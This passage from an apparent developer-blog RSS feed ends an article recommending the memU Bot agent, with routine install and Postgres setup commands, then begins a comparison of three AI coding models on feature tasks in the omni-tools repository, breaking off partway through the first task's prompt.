&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kh9ebx6inxnrato08td.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kh9ebx6inxnrato08td.png" alt="memU bot - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;memU Bot is built for people who want an agent that keeps running and becomes more useful over time, instead of resetting to zero every time you open a new chat.&lt;/p&gt;

&lt;p&gt;The site definitely looks like it was coded by a 12-year-old 😭, but don’t let that scare you off, because the product underneath is really good.&lt;/p&gt;

&lt;p&gt;Under the hood, it’s tied to &lt;strong&gt;memU&lt;/strong&gt;, NevaMind’s memory framework for long-running proactive agents, with a focus on reducing long-run context cost by caching insights.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Always-on + proactive:&lt;/strong&gt; it’s designed to sit in the background and capture intent (not just respond to prompts).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory system that scales:&lt;/strong&gt; memU treats memory like a file system (categories, memory items, cross-links), so the agent can fetch relevant fragments instead of shoving the whole history into every request.&lt;/li&gt;
&lt;/ul&gt;
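&lt;p&gt;A rough mental model of that "memory as a file system" idea, with invented names (memU's real storage schema lives in its backends):&lt;/p&gt;

```shell
# Categories are directories, memory items are files,
# and a cross-link is just a reference from one item to another.
mkdir -p memory/preferences memory/projects
echo "prefers short, direct answers" > memory/preferences/tone.md
echo "working on an RSS cleanup script" > memory/projects/rss-cleanup.md
echo "see: ../preferences/tone.md" >> memory/projects/rss-cleanup.md

# Retrieval fetches only the relevant fragment, not the whole history:
grep -rl "cleanup" memory/   # matches only the project note
```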
&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;

&lt;p&gt;It's a bit more involved than other options.&lt;/p&gt;

&lt;p&gt;If you just want the product (memU Bot):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to &lt;a href="http://memu.bot/" rel="noopener noreferrer"&gt;memu.bot&lt;/a&gt;, enter your email, and get the download link they send you.&lt;/li&gt;
&lt;li&gt;Install it like a normal desktop app (they provide a macOS .dmg in the tutorial flow).&lt;/li&gt;
&lt;li&gt;Start it, connect the channel you want (Telegram, etc.), and let it run so it can build memory over time.
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you want to run the open-source memU framework locally instead:&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/NevaMind-AI/memU.git
&lt;span class="nb"&gt;cd &lt;/span&gt;memU

&lt;span class="c"&gt;# Requires Python 3.13+&lt;/span&gt;
pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;

&lt;span class="c"&gt;# set your key (OpenAI is the default in their quick tests)&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your_api_key"&lt;/span&gt;

&lt;span class="c"&gt;# quick test using in-memory storage&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
python test_inmemory.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Want persistent memory backed by Postgres + pgvector?&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; memu-postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_USER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_DB&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;memu &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt; 5432:5432 &lt;span class="se"&gt;\&lt;/span&gt;
  pgvector/pgvector:pg16

&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your_api_key"&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
python test_postgres.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;They also provide a small runnable "proactive loop" example if you want to see the behavior without going through tests:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;examples/proactive
python proactive.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;There's also a &lt;a href="https://github.com/NevaMind-AI/memU/blob/main/README.md#option-1-cloud-version" rel="noopener noreferrer"&gt;Cloud version&lt;/a&gt; which you can try out as well.&lt;/p&gt;

&lt;p&gt;It might be worth checking this out: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/M9ShNSaP8b8"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;



&lt;blockquote&gt;
&lt;p&gt;If you know of any other useful OpenClaw alternative tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That concludes this article. Thank you so much for reading! 🫡&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>ai</category>
      <category>productivity</category>
      <category>opensource</category>
      <category>security</category>
    </item>
    <item>
      <title>🔥 Claude Opus 4.5 vs GPT 5.2 High vs Gemini 3 Pro: Production Coding Test ✅</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Sun, 18 Jan 2026 12:41:12 +0000</pubDate>
      <link>https://forem.com/tensorlake/claude-opus-45-vs-gpt-52-high-vs-gemini-3-pro-production-coding-test-25of</link>
      <guid>https://forem.com/tensorlake/claude-opus-45-vs-gpt-52-high-vs-gemini-3-pro-production-coding-test-25of</guid>
      <description>&lt;p&gt;Okay, so right now the &lt;strong&gt;WebDev&lt;/strong&gt; leaderboard on LMArena is basically owned by the big three: Claude Opus 4.5 from &lt;strong&gt;Anthropic&lt;/strong&gt;, GPT-5.2-codex (high) from &lt;strong&gt;OpenAI&lt;/strong&gt;, and finally everybody's favorite, Gemini 3 Pro from &lt;strong&gt;Google&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltml19xef278wmy3f5y1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fltml19xef278wmy3f5y1.png" alt="LLMDev models ranking"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, I grabbed these three and put them into the same existing project (over 8K stars and 50K+ LOC) and asked them to build a couple of real features like a normal dev would.&lt;/p&gt;

&lt;p&gt;Same repo. Same prompts. Same constraints.&lt;/p&gt;

&lt;p&gt;For each task, I took the best result out of three runs per model to keep things fair.&lt;/p&gt;

&lt;p&gt;Then I compared what they actually did: code quality, how much hand-holding they needed, and whether the feature even worked in the end.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; Don't take these results as a hard rule. This is a small set of real-world coding tasks that shows how each model performed for me in this exact setup, and it gives a rough sense of how the top three models compare on identical work.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you want a quick take, here’s how the three models performed in our tests:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.5&lt;/strong&gt; was the most consistent overall. It shipped working results for both tasks, and the UI polish was the best of the three. The main downside is cost. If they find a way to achieve this performance while reducing cost, it will actually be over for most other models.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.2-codex (high)&lt;/strong&gt; also performed very well, though it's noticeably slower due to the high reasoning setting. When it hit, the code quality and structure were great, but it needed more patience than the other two in this repo.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Gemini 3 Pro&lt;/strong&gt; was the most efficient. Both tasks worked, but the output often felt like the minimum viable version, especially on the analytics dashboard.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 If you want the safest pick for real “ship a feature in a big repo” work, Opus 4.5 felt the most reliable in my runs. If you care about speed and cost and you’re okay polishing UI yourself, Gemini 3 Pro is a solid bet.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Test Workflow
&lt;/h2&gt;

&lt;p&gt;For the test, we will use the following CLI coding agents:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.5:&lt;/strong&gt; Claude Code (Anthropic’s terminal-based agentic coding tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Gemini 3 Pro:&lt;/strong&gt; Gemini CLI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.2 High:&lt;/strong&gt; Codex CLI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here’s the repo used for the entire test: &lt;a href="https://github.com/iib0011/omni-tools" rel="noopener noreferrer"&gt;iib0011/omni-tools&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will check the models on two different tasks:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Task 1:&lt;/strong&gt; Add a global Action Palette (Ctrl + K)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each model is asked to create a global action menu that opens with a keyboard shortcut. This feature expands on the current search by adding actions, global state, and keyboard navigation. The task checks how well the model understands the existing UX patterns and reuses code instead of duplicating it, without breaking what's already in place.&lt;/p&gt;

&lt;ol start="2"&gt;
&lt;li&gt;
&lt;strong&gt;Task 2:&lt;/strong&gt; Tool Usage Analytics + Insights Dashboard&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Each model had to add real usage tracking across the app, persist it locally, and then build an analytics dashboard that shows things like the most used tools, recent activity, and basic filters.&lt;/p&gt;

&lt;p&gt;We’ll compare code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; I will share the source code changes for each task and model as a &lt;code&gt;.patch&lt;/code&gt; file. You can view them locally by cloning the repository and applying the patch with &lt;code&gt;git apply &amp;lt;patch_file_name&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
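&lt;p&gt;If you haven't used patch files before, the round trip looks like this. The repo and file names below are placeholders for a self-contained demo; in practice you'd clone &lt;code&gt;iib0011/omni-tools&lt;/code&gt; and apply the shared &lt;code&gt;.patch&lt;/code&gt; file:&lt;/p&gt;

```shell
# Create a throwaway repo, capture a change as a patch, and re-apply it.
git init -q demo-repo
cd demo-repo
git config user.email demo@example.com
git config user.name demo
echo "hello" > app.txt
git add app.txt
git commit -qm "base commit"
echo "world" >> app.txt
git diff > ../model.patch      # the kind of file shared per task
git checkout -- app.txt        # reset back to the base commit state
git apply ../model.patch       # re-apply the model's changes
cd ..
```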




&lt;h2&gt;
  
  
  Real-world Coding Tests
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Test 1: Add a global Action Palette (Ctrl + K)
&lt;/h3&gt;

&lt;p&gt;The setup is simple: all models start from the same base commit and follow the same prompt.&lt;/p&gt;

&lt;p&gt;And as mentioned, I evaluated each model on its best result out of three runs.&lt;/p&gt;

&lt;p&gt;Let's start off the test with something interesting:&lt;/p&gt;

&lt;p&gt;Here's the prompt used:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;project&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;already&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;has&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;search&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;input&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;page&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;lets&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;users&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;find&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;I&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;want&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;add&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;an&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;improved,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;global&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span 
class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;idea&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;works&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;an&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;**Action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Palette**,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;similar&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;what&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;you&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;see&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;editors&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;like&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;VS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Code.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;**What&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;build**&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Pressing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;**Ctrl&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;K**&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(or&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Cmd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;K&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;macOS)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;open&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;centered&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;palette&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;overlay&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;anywhere&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;app.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;The&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;palette&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;support:&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Searching&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigating&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(reuse&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;metadata)&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Executing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;actions,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;such&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as:&lt;/span&gt;&lt;span class="w"&gt;

    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Toggle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;dark&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;mode&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Switch&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;language&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Toggle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;user&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;filter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;(General&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;/&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Developer)&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Navigate&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Bookmarks&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Clear&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;recently&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;used&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tools&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Fully&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;keyboard-driven&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;experience:&lt;/span&gt;&lt;span class="w"&gt;

  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;filter&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Arrow&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;keys&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigate&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Enter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;execute&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Escape&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;close&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;**Notes**&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;This&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;should&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;not&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;replace&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;existing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;home&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;page&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;search.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Think&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;it&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;more&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;powerful,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;global&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;that&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;combines&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;navigation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;actions.&lt;/span&gt;&lt;span class="w"&gt;
